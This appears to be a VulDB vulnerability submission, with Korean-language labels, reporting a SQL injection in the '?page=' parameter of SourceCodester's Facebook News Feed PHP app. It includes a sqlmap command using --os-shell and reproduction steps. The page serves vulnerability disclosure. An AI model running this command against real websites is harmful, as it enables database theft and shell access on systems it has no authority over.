| 제목 | SourceCodester facebook 1.0 SQL Injection |
|---|
| 설명 | # Exploit Title: Facebook News Feed - SQL Injection
# Exploit Author: Raj
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:-
A SQL Injection issue in Facebook News Feed allows to get an complete Remote Access into the website. Access such as database, files and everything.
`
Payload used:-
python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell
`
Vulnerable Parameter:-
?page=
`
Steps to reproduce:-
1. Here we take the GET method of "http://localhost:8080/fb/index.php?page=home" just this page only
2. In this we target our parameter as "page".
3. Now we are gonna use "SQLMap" tool and with this following command
**python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell** |
|---|
| 사용자 | Cyberraj (UID 59481) |
|---|
| 제출 | 2024. 05. 25. PM 03:08 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 05. 25. PM 08:25 (5 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 266302 [SourceCodester Facebook News Feed Like 1.0 index.php page SQL 주입] |
|---|
| 포인트들 | 17 |
|---|